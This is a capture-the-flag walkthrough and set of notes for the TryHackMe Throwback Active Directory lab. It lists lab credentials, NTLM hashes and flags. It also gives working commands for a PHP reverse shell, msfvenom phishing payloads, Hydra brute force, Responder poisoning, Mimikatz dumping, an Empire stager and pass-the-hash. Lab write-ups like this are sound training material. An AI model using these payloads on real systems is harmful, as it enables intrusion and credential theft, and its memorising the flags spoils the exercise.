# TryHackMe Throwback room
* https://tryhackme.com/room/throwback
* Learning notes and writeups
* https://flikk.home.blog/2020/10/12/tryhackme-throwback-network-part-3-prod-and-time/
* https://leosmith.xyz/blog/throwback-tryhackme-writeup.html
* https://medium.com/@hyphens443/tryhackme-active-directory-throwback-network-f5bbb0105f23

## Findings
### Credentials
* Email accounts
    * `MurphyF:Summer2020`,`Frank Murphy`,`MurphyF@throwback.local`
    * `HumphreyW`,`W Humphrey`,`HumphreyW@throwback.local`
	* `SummersW`,`Summers Winters`,`SummersW@throwback.local`
	* `FoxxR`,`Rikka Foxx`,`FoxxR@throwback.local`
	* `noreply`,`noreply noreply`,`noreply@throwback.local`
	* `DaibaN`,`Nana Daiba`,`DaibaN@throwback.local`
	* `PeanutbutterM`,`Mr Peanutbutter`,`PeanutbutterM@throwback.local`
	* `PetersJ`,`Jon Peters`,`PetersJ@throwback.local`
	* `DaviesJ`,`J Davies`,`DaviesJ@throwback.local`
	* `BlaireJ`,`J Blaire`,`BlaireJ@throwback.local`
	* `GongoH`,`Hugh Gongo`,`GongoH@throwback.local`
	* `JeffersD`,`D Jeffers`,`JeffersD@throwback.local`
	* `HorsemanB`,`BoJack Horseman`,`HorsemanB@throwback.local`
* SSH Users - 10.200.60.219
    * `SummersW`
    * `FoxxR`
    * `DaibaN`
    * `HorsemanB`
    * `Rikka`
    * `Nana`
    * `BlaireJ`
* Firewall - 10.200.60.138
    * GUI : `admin:pfsense`
    * SSH : `root:pfsense` (not sure if it works)
    * `HumphreyW:securitycenter`
        * Also got his ssh private key
* Windows accounts - 10.200.60.222
    * `BlaireJ:7eQgx6YzxgG3vC45t5k9`
    * `PetersJ:Throwback317`
    * `admin-petersj:SinonFTW123!`
    * `Administrator`
        * NTLM : `a06e58d15a2585235d18598788b8147a`
* Other users:
    * `spooks`
    * `sshd`
        * NTLM : 50527b4bfe81a64edf00e6b05c26c195
* Time Server
    * `murphyf:WHATEVERICHOOSE`
* Github (Database):
    * `DaviesJ:Management2018`

### Flags
* Mail Server
    * `TBH{ede543c628d365ab772078b0f6880677}`
    * `TBH{4060a70860f0a1648e5a991de1739888}`
* Firewall
    * `TBH{c9cf8b688a9b8677a4546781527e4484}`
    * `TBH{b6f17a9c06e75ea4a09b79e8d89f9749}`
* Throwback-PROD
    * `TBH{277c5929d176569338ce0cff02f328c0}`
    * `TBH{9b56df4dc5cbda864a246ebfe4964d6c}`
* Time Server
    * `TBH{326e71e82d2cfc439ee513340b8d9222}`
* LinkedIn : 
    * `TBH{2913c22315f3ce3c873a14e4862dd717}`
* Twitter
    * `TBH{ca57861454b195f6a5c951a634e05f9e}`
* GitHub
    * `TBH{19fa56ead6f82d8c4abc664e2e56f0b1}`

## Host Discovery and Port Scanning
* `nmap -sn 10.200.60.0/24`
* `nmap -sV -sC -p- -oA . -v 10.200.60.0/24 --min-rate 5000`

### Scan Results
* 10.200.60.138 - Throwback-FW01
    * 22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)
    * 53/tcp  open  domain   (generic dns response: REFUSED)
    * 80/tcp  open  http     nginx
    * 443/tcp open  ssl/http nginx
* 10.200.60.219 - Throwback-PROD
    * 22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    * 80/tcp   open  http          Microsoft IIS httpd 10.0
    * 135/tcp  open  msrpc         Microsoft Windows RPC
    * 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    * 445/tcp  open  microsoft-ds?
    * 3389/tcp open  ms-wbt-server Microsoft Terminal Services
    * 5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
* 10.200.60.232 - Throwback-MAIL
    * 22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    * 80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
        * |_http-server-header: Apache/2.4.29 (Ubuntu)
        * | http-title: Throwback Hacks - Login
        * |_Requested resource was src/login.php
    * 143/tcp open  imap     Dovecot imapd (Ubuntu)
    * 993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
* 10.200.60.250 - ?
    * 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)


## Web Discovery
* 10.200.60.219
    * Manual exploration
        * CEO = Summers Winters
        * CFO = Jeff Davies
        * CTO = Hugh Gongo
        * Lead Dev = Rikka Foxx
        * hello@TBHSecurity.com
        * Located in Great Britain
    * `gobuster dir -u http://10.200.60.219 -w /usr/share/wordlists/dirb/big.txt -t 100`
        * No result
    * `gobuster dir -u http://10.200.60.219 -w /usr/share/wordlists/dirb/big.txt -t 100 -x .php,.txt,.bak,.html`
        * /index.html
        * /cannon.html => Squirtle's IP Cannon
        * /data.txt => 10.41.0.2
        * phpinfo.php
            * Windows NT THROWBACK-PROD 10.0 build 17763 (Windows Server 2016) AMD64 
            * x64 
            * Zend Engine v3.4.0 
            * PHP 7.4.1 
        * /request.php => Image
    * `gobuster dir -u http://10.200.60.219 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100`
        * No additional pages found
* 10.200.60.138
    * Manual exploration
        * PF Sense Login Page
    * `gobuster dir -u https://10.200.60.138 -w /usr/share/wordlists/dirb/big.txt -t 100 -k`
        * /classes
        * /css
        * /includes
        * /js
        * /simplepie
        * /status
        * /vendor
        * /widgets
        * /wizards
* 10.200.60.232
    * `gobuster dir -u http://10.200.60.232 -w /usr/share/wordlists/dirb/big.txt -t 100`
        * http://10.200.60.232/src/login.php/ => LOGIN FORM
            * tbhguest:WelcomeTBH1!
        * /.htaccess
        * README
        * /attach
        * /class
        * /config
        * /configure
        * /contrib
        * /css
        * /data
        * /doc
        * /functions
        * /help
        * /images
        * /include
        * /locale
        * /pics
        * /po
        * /plugins
        * /src
        * /templates
        * /themes


## Email exploration
* Login with creds found ealier
* Find an email in the mail box with a flag : `TBH{ede543c628d365ab772078b0f6880677}`
* Check Address book : 
    * HumphreyW 	W Humphrey 	    HumphreyW@throwback.local
	* SummersW 	    Summers Winters SummersW@throwback.local
	* FoxxR 	    Rikka Foxx 	    FoxxR@throwback.local
	* noreply 	    noreply noreply noreply@throwback.local
	* DaibaN 	    Nana Daiba 	    DaibaN@throwback.local
	* PeanutbutterM Mr Peanutbutter PeanutbutterM@throwback.local
	* PetersJ 	    Jon Peters 	    PetersJ@throwback.local
	* DaviesJ 	    J Davies 	    DaviesJ@throwback.local
	* BlaireJ 	    J Blaire 	    BlaireJ@throwback.local
	* GongoH 	    Hugh Gongo 	    GongoH@throwback.local
	* MurphyF 	    Frank Murphy 	MurphyF@throwback.local
	* JeffersD 	    D Jeffers 	    JeffersD@throwback.local
	* HorsemanB 	BoJack Horseman HorsemanB@throwback.local
* Flag found : `TBH{4060a70860f0a1648e5a991de1739888}`


## Throwback-FW01 - 10.200.60.138 - SSH Exploitation
* `searchsploit openssh 7.5` : `OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py`
* CVE-2018-15473
* Also a Metasploit module : `auxiliary/scanner/ssh/ssh_enumusers`
* Users found (unclear if these are good or not) :
    * `HumphreyW`
    * `SummersW`
    * `FoxxR`
    * `DaibaN`
    * `HorsemanB`
    * `Rikka`
    * `Nana`
* Metasploit `auxiliary/scanner/ssh/ssh_login`
    * `rockyou.txt` with `HumphreyW`
        * Nothing
    * `rockyou.txt` with `SummersW`
        * Nothing

##  Throwback-FW01 - 10.200.60.138 - PFsense Exploitation
* Find default credentials on the internet :
    * SSH : `root:pfsense`
    * GUI : `admin:pfsense` : WORKS!
* Find the diagnostics tab and the PHP interpreter
* Start a netcat listener : `nc -lvnp 4444`
* Run PHP code : `$sock=fsockopen("10.50.57.11",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`
    * Get a shell as root
    * `uname -a` : `FreeBSD 11.3-STABLE FreeBSD 11.3-STABLE #239 amd64`
* Run this PHP code : `$sock=fsockopen("10.50.57.11",4445);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`
    * With Metasploits : `/exploit/multi/handler` set to payload `linux/x64/shell_reverse_tcp`
* Upgrade to meterpreter with : `post/multi/manage/shell_to_meterpreter`
* Home directory : 
    * `ec2-user`
    * `spooks`
* `/etc/passwd`
    * root (Charlie)
    * toor (Bourne-again Superuser)
    * admin (System Administrator)
    * ec2-user (EC2 User)
* `/etc/pwd.db`
    * ?
* `/var/log/flag.txt` : `TBH{c9cf8b688a9b8677a4546781527e4484}`
* `/root/root.txt` : `TBH{b6f17a9c06e75ea4a09b79e8d89f9749}`
* `/var/log/login.log` : `HumphreyW:1c13639dba96c7b53d26f7d00956a364`
    * Le hash NTLM est le mdp suivant : `securitycenter`

## Email Brute Force Login
* `hydra 10.200.60.232 -L usernames -p securitycenter http-form-post "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -t 10 -VV -I`
    * Gives us a combination we knew already : `HumphreyW:securitycenter`
* `hydra 10.200.60.232 -L usernames -P usernames http-form-post "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -t 10 -VV -I`
    * Nothing found
* `hydra 10.200.60.232 -l MurphyF -P /usr/share/wordlists/seclists/Passwords/2020-200_most_used_passwords.txt http-form-post "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -t 10 -VV -I`
    * Nothing found
* `hydra 10.200.60.232 -l MurphyF -P passwords http-form-post "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -t 10 -VV -I`
    * passwords = made with list from the text on THM ( Wait, just you mean just one this time? )
    * Found this : `MurphyF:Summer2020`

## Email exploration with HumphreyW
* Address book is empty
* All mailboxes are empty

## Email exploration with MurphyF
* URL to change password :
    * `http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=PASSWORD`
* Nothing else

## Phishing Attack
* Create payload : `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.57.11 LPORT=53 -f exe -o NotAShell.exe`
* Start handler on Metasploit : `exploit/multi/handler`
* Send email to every email we know with the payload as an attachment
* Got a Meterpreter shell after few minutes
    * `sysinfo`
        * `THROWBACK-WS01`
        * `Windows 10 (10.0 Build 19041) x64`
        * Domain : `THROWBACK` 
    * `getuid`
        * `THROWBACK-WS01\BlaireJ`
* `ps`, look for `lsass.exe` : 788
* `migrate 788`
* Flags
    * User flag in `C:\Users\humphreyw\Desktop\user.txt` : `TBH{813e2c2709ceb02041891acaec55121d}`
    * Root flag in `C:\Users\BlaireJ\Desktop\root.txt` : `TBH{9c5e361a2368723e042924180be7c958}`

### Mimikatz on WS01
* `ps`, look for `lsass.exe` : 796
* `migrate 796`
* `hashdump`
    * Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    * BlaireJ:1001:aad3b435b51404eeaad3b435b51404ee:c374ecb7c2ccac1df3a82bce4f80bb5b:::
    * sshd:1002:aad3b435b51404eeaad3b435b51404ee:50527b4bfe81a64edf00e6b05c26c195:::
* `load kiwi`
* `lsa_dump_sam`
    * BlaireJ 
        * NTLM : c374ecb7c2ccac1df3a82bce4f80bb5b
    * sshd
        * NTLM : 50527b4bfe81a64edf00e6b05c26c195

* `creds_all`
    * BlaireJ
        * THROWBACK-WS01
        * c374ecb7c2ccac1df3a82bce4f80bb5b  
        * 6522277853426f24275c4c0b0381458ef452e640
    * THROWBACK-WS01$
        * THROWBACK
        * c4aed3492facf8ed447c8832321e3b5c
        * afdf8fc623befca44de72b26ddd3992d8a80e7dc

## THROWBACK-PROD SMB LOGIN
* Password spraying : `crackmapexec smb 10.200.60.219 -u usernames -p passwords`
    * Works : `THROWBACK.local\HumphreyW:securitycenter`
* Shares enum : `crackmapexec smb 10.200.60.219 -u humphreyw -p securitycenter -d THROWBACK.local --shares`
    * `Users` (READ permission)
    * `ÌPC$` (READ permission)
* Share mapping : `smbmap -u humphreyw -p securitycenter -d THROWBACK.local -R Users -H 10.200.60.219`
    * Lots of things (looks like a complete FS)
* Mount share : `sudo mount -t cifs -o username=humphreyw,password=securitycenter //10.200.60.219/Users /mnt/PROD-Users`
* Found a SSH private key in : `/mnt/PROD-Users/humphreyw/.ssh/id_rsa` and copied it


## LLMNR Poisoning with Responder
* `sudo responder -I tun1 -rdw -v`
* Break hash : `hashcat.exe -a 0 -m 5600 ..\hash.txt ..\rockyou.txt -r rules/OneRuleToRuleThemAll.rule`
    * `PetersJ:Throwback317`

## Throwback-PROD through SSH
* SSH with PetersJ
* Found a flag in : `C:\Users\petersj\Desktop\user.txt`
    * `more user.txt` : `TBH{277c5929d176569338ce0cff02f328c0}`
* Interesting files in : `C:\` (maybe files from another attacker?)
    * `test.py`
    * `uniqueIPs.txt`
    * `update.ps1`

## Setup C2 (Powershell Empire)
* Start Powershell Empire : `sudo powershell-empire --headless`
* Deploy startkiller : `starkiller`
    * url : https://localhost:1337
    * username : empireadmin
    * password : password123
* Start an HTTP listener :
    * Host : `http://10.50.57.11`
    * Port : 53
    * If can't start listener, stop any service on port 53 (ex: Responder.py)
* Start a stager : 
    * Type : `windows/launcher_bat`
    * Listener : The one created in previous step
    * Language : `powershell`
* Execute launcher from target machine
    * On Kali : `python3 -m http.server`
    * SSH : `ssh petersJ@10.200.60.219`
    * Get powershell shell : `powershell`
    * Get launcher : `wget 10.50.57.11:8000/launcher.bat -outfile launcher.bat`
    * `./launcher.bat`
    * Should get the agent on starkiller

## Escalate on Throwback-PROD - 10.200.60.219
* Run enumeration script like winPEAS or seatbelt
* Seatbelt output : 
    * `[*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt`
    * `[*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module`
    * `[*] You can also use SharpDPAPI for masterkey retrieval.`
    * `DefaultUserName : BlaireJ`
    * `DefaultPassword : 7eQgx6YzxgG3vC45t5k9`
* Connect to SSH with : `BlaireJ` and do the same step to get a Empire agent one there
* Seatbelt output : 
    * `Vault GUID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28`
    * `Vault Type : Web Credentials`
    * So there are credentials in the vault. We can used them to do something
* `net user` : 
    * Administrator            
    * admin-petersj            
    * DefaultAccount           
    * Guest                    
    * sshd                     
    * WDAGUtilityAccount 
* RDP in the machine using Remmina
    * Flag on the desktop in user.txt : `TBH{9b56df4dc5cbda864a246ebfe4964d6c}`
* Start a CMD as Administrator
* Run : `net user admin-petersj  testtesttest` to change its password
* Connect with SSH and user admin-petersj then do the same steps to get an Empire agent

## Pivoting on Throwback-PROD - 10.200.60.219
* Execute module : `powershell/credentials/mimikatz/command` with : 
     * `privilege::debug`
     * `token::elevate`
     * `lsadump::lsa /patch`
        * `admin-petersj` NTLM : `ce4904d6842ec31f2da36efefe0d011e`
        * `Administrator`NTLM : `a06e58d15a2585235d18598788b8147a`
    * `sekurlsa::tickets /export`
    * `sekurlsa::logonPasswords`
* Execute module : `powershell/credentials/mimikatz/lsadump`
* Execute module : `powershell/credentials/mimikatz/sam`
* Creds are now in Starkiller -> Credentials
    * `admin-petersj:SinonFTW123!`
    * `blairej:c374ecb7c2ccac1df3a82bce4f80bb5b`
    * `administrator:a06e58d15a2585235d18598788b8147a`

## Getting Meterpreter on Throwback-PROD - 10.200.60.219
* Create payload : `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.57.11 LPORT=53 -f exe -o NotAShell.exe`
* Create listener on Metasploit
* I sent the payload using Empire and executed it 

## Network Pivoting on WS01
* Start with a SYSTEM Meterpreter shell on WS01 (after getting the flags)
    * Get in though phishing
* Background the shell
* Setup Autoroute
    * `use post/multi/manage/autoroute`
    * `set session 1`
    * `set subnet 10.200.60.0`
    * `exploit`
* Setup Proxy
    * `use auxiliary/server/socks_proxy`
    * `set version 4a`
    * `exploit`
* Configure ProxyChains in `/etc/proxychains.conf`
    * Setup the good port. The only line in ProxyList should be :
    * `socks4 127.0.0.1 1080`
* Test the proxy
    * `proxychains nmap 10.200.60.0/24`
* Setup FoxyProxy with the correct settings

### Domain users enumeration
* `net user /domain`
```
Administrator            AndersonD                AtkinsB                  
backup                   BaldwinB                 BentonA                  
BlackenshipV             BlackwellA               BlaireJ                  
BoyerV                   BrenardJ                 BrooksK                  
BurchR                   BurtonV                  CastroJ                  
ClayS                    CochranH                 CortezD                  
CunninghamS              DaibaN                   DotsonJ                  
EatonR                   FoleyS                   FoxxR                    
GongoH                   Guest                    GuthrieA                 
HamptonF                 HansonsW                 HardingE                 
HaydenC                  horsemanb                HumphreyW                
JacobsonD                JeffersD                 KramerP                  
krbtgt                   LambJ                    LindseyN                 
LivingstonM              LoginService             MercerH                  
MontoyaI                 NealR                    NievesD                  
NixonJ                   ParkerL                  PateD                    
PetersenA                PetersJ                  PooleW                   
PowellW                  QuinnC                   RosalesT                 
SextonL                  SosaL                    SpenceJ                  
spooks                   SQLService               sshd                     
STAGEService             StanleyL                 StuartL                  
TaskMgr                  TBService                ThortonD                 
TrevinoC                 WebbH                    WEBService               
WhiteR                   WilkinsonE               WilliamsonM              
WintersS  
```

### SharpHound on WS01 (Domain enum)
* Get a powershell shell as an admin account
* Download SharpHound : `https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1`
* Get it there : `wget http://10.50.57.11:8000/SharpHound.ps1 -outfile SharpHound.ps1`
* Run it : ``

### Pass the Hash on WS01
* `proxychains crackmapexec smb 10.200.60.0/24 -u <USER> -d <DOMAIN> -H <HASH>`
* `proxychains crackmapexec smb 10.200.60.0/24 -u blairej -d THROWBACK.local -H c374ecb7c2ccac1df3a82bce4f80bb5b`
    * Successfull
    * Users `blairej` and `HumphreyW` are vulnerable to Pass-The-Hash
* `sudo proxychains evil-winrm -i 10.200.60.176 -u Administrator -H a06e58d15a2585235d18598788b8147a`
    * Not working
* `sudo proxychains evil-winrm -i 10.200.60.176 -u blairej -H c374ecb7c2ccac1df3a82bce4f80bb5b`
    * Not working


## Time Server* 
* `murphyf`
* Ajust hosts file by adding : `10.200.60.176 timekeep.throwback.local`
* `http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=test`
    * `password successfully updated TBH{326e71e82d2cfc439ee513340b8d9222}`
* Now login with `murphy:test`
    * Go to `Upload Time Card`
* File must be : `Timesheet.xlsm`


## OSINT

### LinkedIn
* Compagny : `Throwback Hacks Security`
* Employees : 
    * `Summer Winters`
    * `Rikka Foxx`
        * Flag in activities : `TBH{2913c22315f3ce3c873a14e4862dd717}`
    * `Jon Stewart`
    * `LinkedIn Member` (can't access)

### Twitter
* A google search gives : https://twitter.com/tbhsecurity?lang=fr
    * Flag in Tweets: `TBH{ca57861454b195f6a5c951a634e05f9e}`
* https://twitter.com/tbhSWinters
* https://twitter.com/tbhRikkaFoxx

### GitHub
* `Rikka Foxx` has an account
    * https://github.com/RikkaFoxx
    * Flag in account : `TBH{19fa56ead6f82d8c4abc664e2e56f0b1}`
* Credentials in old commit : https://github.com/RikkaFoxx/Throwback-Time/commit/33f218dcab06a25f2cfb7bf9587ca09e2bfb078c
    * `DaviesJ:Management2018`
    * Probably MySQL database credentials
